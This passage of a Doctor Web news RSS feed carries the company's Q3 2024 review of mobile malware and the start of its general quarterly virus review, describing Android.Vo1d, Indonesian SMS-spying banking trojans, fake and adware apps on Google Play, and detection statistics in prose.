&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Linux.Rootkit.400&amp;lng=en"&gt;&lt;b&gt;Linux.Rootkit.400&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14912&amp;lng=en</guid><title>Doctor Web’s Q3 2024 review of virus activity on mobile devices</title><link>https://news.drweb.com/show/?i=14912&amp;lng=en&amp;c=9</link><pubDate>Tue, 01 Oct 2024 03:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;October 1, 2024&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojan apps, used by threat actors in various fraudulent schemes, were the malicious programs most frequently detected on protected devices in the third quarter of 2024. Adware trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family ranked second. The third most commonly detected threats were &lt;b&gt;Android.Siggen&lt;/b&gt; trojans—programs that have different malicious functionality and that are difficult to classify into any particular family.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;In August, Doctor Web’s experts discovered the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor, which had infected nearly 1.3 million Android TV box sets belonging to users in 197 countries. This malicious app places its components into the system storage area of infected devices and, when commanded by threat actors, can covertly download and install various programs.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" alt="Countries with the highest number of infected devices detected" style="width:75%;"&gt;
  &lt;/a&gt;
&lt;/p&gt;

  &lt;p&gt;In addition, banking trojans targeting Indonesian users were found. One of these, &lt;b&gt;Android.SmsSpy.888.origin&lt;/b&gt;, is protected with a software packer and detected as &lt;b&gt;Android.Siggen.Susp.9415&lt;/b&gt;. It was distributed under the guise of the BRI bank customer support app BRImo Support.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_1_en.jpg" class="preview alignCenter"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_1_en.1.jpg" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  
  &lt;p&gt;When launched, the trojan loads the real bank website https://bri.co.id in WebView. At the same time, it uses a Telegram bot API to send technical information about the infected device into the Telegram chat created by the threat actors.&lt;/p&gt;
  &lt;p&gt;&lt;b&gt;Android.SmsSpy.888.origin&lt;/b&gt; intercepts incoming SMS and also sends them into this chat. When it receives messages like &lt;span class="string"&gt;55555, &amp;lt;number&amp;gt;, &amp;lt;text&amp;gt;&lt;/span&gt;, it interprets them as commands and sends corresponding messages containing the text &lt;span class="string"&gt;&amp;lt;text&amp;gt;&lt;/span&gt; to the number &lt;span class="string"&gt;&amp;lt;number&amp;gt;&lt;/span&gt;. This way, the malware can both send SMS spam and spread among users.&lt;/p&gt;
  &lt;p&gt;Another trojan that attacked Indonesian users was &lt;b&gt;Android.SmsSpy.11629&lt;/b&gt;. This malicious program is an SMS spy that is distributed under the guise of all kinds of apps. The variant in question was targeting Bank Mandiri Taspen customers and was passed off by the attackers as an official banking app—Movin by Bank Mandiri Taspen. The trojan displays instructions to potential victims and asks them to accept a user agreement. When a user accepts it, the trojan requests the permissions needed to work with SMS.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_2_en.jpg" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_2_en.1.jpg" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_3_en.jpg" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_3_en.1.jpg" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_4_en.jpg" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_4_en.1.jpg" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;  

  &lt;p&gt;Next, the malicious program loads a real page of the bank’s website https://mail.bankmantap.co.id/: in WebView:&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_5_en.jpg" class="preview alignCenter"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_5_en.1.jpg" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;&lt;b&gt;Android.SmsSpy.11629&lt;/b&gt; intercepts all incoming SMS. Next, it uses the Telegram bot API to send these messages into the attackers’ Telegram chat. It adds the text &lt;span class="string"&gt;developed by : @AbyssalArmy&lt;/span&gt; to all of the messages.&lt;/p&gt;
  &lt;p&gt;At the same time, our malware analysts again discovered threats on Google Play. Among them were many new fake apps and several ad-displaying trojans.&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;PRINCIPAL TRENDS OF Q3 2024&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;The &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor infected over a million TV box sets&lt;/li&gt;
      &lt;li&gt;High activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious apps, which are used to commit fraud&lt;/li&gt;
      &lt;li&gt;High activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans &lt;/li&gt;
      &lt;li&gt;The emergence of new malware on Google Play      &lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;

  &lt;h2 class="alignCenter"&gt;According to statistics collected by Dr.Web Security Space for mobile devices&lt;/h2&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/02_malware_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/02_malware_q3_2024_en.1.png" alt="According to statistics collected by Dr.Web Security Space for mobile devices"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A trojan app that loads a website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3994&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A trojan app designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7815&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7813&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Trojans that display obnoxious ads. These are special software modules that developers incorporate into applications.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Click.1751&amp;lng=en"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;This trojan is built into third-party WhatsApp messenger mods and camouflaged as Google library classes. While the host application is being used, &lt;a href="https://vms.drweb.com/search/?q=Android.Click.1751&amp;lng=en"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt; connects to one of the C&amp;C servers. It receives two URLs from it. One of them is intended for Russian-speaking users, and the other is for everyone else. The trojan then displays a dialog box whose contents it has also received from a remote server. When a user clicks on the confirmation button, malware loads the corresponding link in their browser.&lt;/dd&gt;
  &lt;/dl&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/03_unwanted_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/03_unwanted_q3_2024_en.1.png" alt="Статистика вредоносных программ в почтовом трафике"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, users can remotely manage these apps. They can block them, display custom dialogs, and track when other software is being installed or removed from a device, etc.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for various modifications of an application that is designed to record videos and take photos in the background, using built-in Android device cameras. It can operate covertly by allowing notifications about ongoing recordings to be disabled. It also allows an app’s icon and name to be replaced with fake ones. This functionality makes this software potentially dangerous.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, use the camera to record video and take photos, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
  &lt;/dl&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/04_riskware_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/04_riskware_q3_2024_en.1.png" alt="Статистика вредоносных программ в почтовом трафике"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A packer tool designed to protect Android applications from unauthorized modifications and reverse engineering. This tool is not malicious in itself, but it can be used to protect both harmless and malicious software.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.17.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A riskware platform that allows applications to launch APK files without installing them. It creates a virtual runtime environment in the context of the apps in which they are integrated. The APK files, launched with the help of this platform, can operate as if they are part of such programs and can also obtain the same permissions.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.2&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change the logic of their work or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads specially prepared scripts from the Internet, which can be crafted and added to the common database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.&lt;/dd&gt;   
  &lt;/dl&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/05_adware_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/05_adware_q3_2024_en.1.png" alt="Статистика вредоносных программ в почтовом трафике"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Adware.ModAd.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for some modified versions (mods) of the WhatsApp messenger, whose functions have been injected with a specific code. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) when the messenger is in operation. Such web addresses perform redirects to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;These are apps that display unwanted ads which often lead to malicious and fraudulent websites. They share a common code base with the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; unwanted applications.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;An adware module that malicious actors embed into the cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;  
  &lt;/dl&gt;

&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
  &lt;h2 class="alignCenter"&gt;Threats on Google Play&lt;/h2&gt;

  &lt;p&gt;In Q3 2024, Doctor Web’s malware analysts continued uncovering threats on Google Play. Among these were many new &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs that were distributed under the guise of a variety of software. Malicious actors passed some of them off as finance-related programs, such as investing apps, financial reference books and teaching aids, different home bookkeeping tools, and so on. Quite a few of these did actually provide the stated functionality, but their primary task is to load fraudulent websites. Such sites promise potential victims quick and easy money through investments, trading natural resources, cryptocurrency, etc. To supposedly join the “service”, users are asked to register an account or to provide personal data by filling out an “application”.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/06_Android.FakeApp.1643_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/06_Android.FakeApp.1643_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/07_Android.FakeApp.1644_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/07_Android.FakeApp.1644_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;

  &lt;p&gt;It is noteworthy that fraudsters disguised one of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans as an online dating and chat app. However, it also loaded a bogus “investing” site.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/08_Android.FakeApp.1624_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/08_Android.FakeApp.1624_q3_2024.1.png" alt="Статистика вредоносных программ в почтовом трафике"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;Other &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans were again distributed as games. Under certain conditions, they loaded online casino and bookmaker sites.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/09_Android.FakeApp.1663_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/09_Android.FakeApp.1663_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/10_Android.FakeApp.1649_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/10_Android.FakeApp.1649_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;

  &lt;p&gt;Among these fake apps, our experts also detected new trojan variants that masquerade as job-search tools. Such malware loads fake job lists and suggests to users that they contact the applicable employer via a messenger (this “employer” is, in fact, a fraudster) or that they create a “resume” by providing personal data.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/11_Android.FakeApp.1627_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/11_Android.FakeApp.1627_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/12_Android.FakeApp.1661_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/12_Android.FakeApp.1661_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;

  &lt;p&gt;Doctor Web’s virus analysts also discovered more &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; trojans on Google Play. These trojans conceal their icons from the home screen menu and start displaying intrusive ads. The detected malware was camouflaged as various apps, including image collections, photo-editing software, and barcode scanners.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/13_Android.HiddenAds.4034_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/13_Android.HiddenAds.4034_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/14_Android.HiddenAds.4100_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/14_Android.HiddenAds.4100_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;

  &lt;p&gt;To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.&lt;/p&gt;

  &lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q3%202024%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;

&lt;/section&gt;

&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;

</description></item><item><guid>https://news.drweb.com/show/?i=14915&amp;lng=en</guid><title>Doctor Web’s Q3 2024 virus activity review</title><link>https://news.drweb.com/show/?i=14915&amp;lng=en&amp;c=9</link><pubDate>Tue, 01 Oct 2024 01:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;October 1, 2024&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;According to the detection statistics collected by the Dr.Web antivirus, the total number of threats detected in the third quarter of 2024 was up 10.81% over the previous quarter. The number of unique threats decreased by 4.73%. The majority of detections were due to adware programs. Also widespread were malicious scripts, ad-displaying trojans, and trojans distributed within other malware to make the latter more difficult to detect. In email traffic, malicious scripts and programs that exploit vulnerabilities in Microsoft Office documents were most commonly detected.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;On Android devices, the most commonly detected threats were trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; family, which are used for fraudulent purposes; &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans; and &lt;b&gt;Android.Siggen&lt;/b&gt; malicious apps possessing different functionality. At the same time, in August, our experts discovered &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, a new trojan that had infected nearly 1.3 million TV box sets running Android. In addition, several banking trojans targeting Indonesian users were found.&lt;/p&gt;
  &lt;p&gt;Doctor Web’s virus laboratory also uncovered many new threats on Google Play throughout the third quarter.&lt;/p&gt;
  
  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;Principal trends in Q3 2024&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;Adware programs remained the most commonly detected threats.&lt;/li&gt;
      &lt;li&gt;Malicious scripts were again predominant in malicious email traffic.&lt;/li&gt;
      &lt;li&gt;Over 1 million Android-based TV box sets were found to be infected with the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor.&lt;/li&gt;
      &lt;li&gt;New threats were discovered on Google Play.      &lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="stat"&gt;
  &lt;h2 class="alignCenter"&gt;According to Doctor Web’s statistics service&lt;/h2&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/01_stat_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/01_stat_q3_2024_en.1.png" alt="According to Doctor Web’s statistics service"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;The most common threats in Q3 2024:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20477&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Adware that often serves as an intermediary installer of pirated software.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.StartPage1.62722&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A malicious program that can modify the home page in the browser settings.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Ubar.20&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A torrent client designed to install unwanted programs on a user’s device.&lt;/dd&gt; 
  &lt;/dl&gt;


  &lt;h2 class="alignCenter"&gt;Statistics for malware discovered in email traffic&lt;/h2&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/02_mail_traffic_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/02_mail_traffic_q3_2024_en.1.png" alt="Statistics for malware discovered in email traffic"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
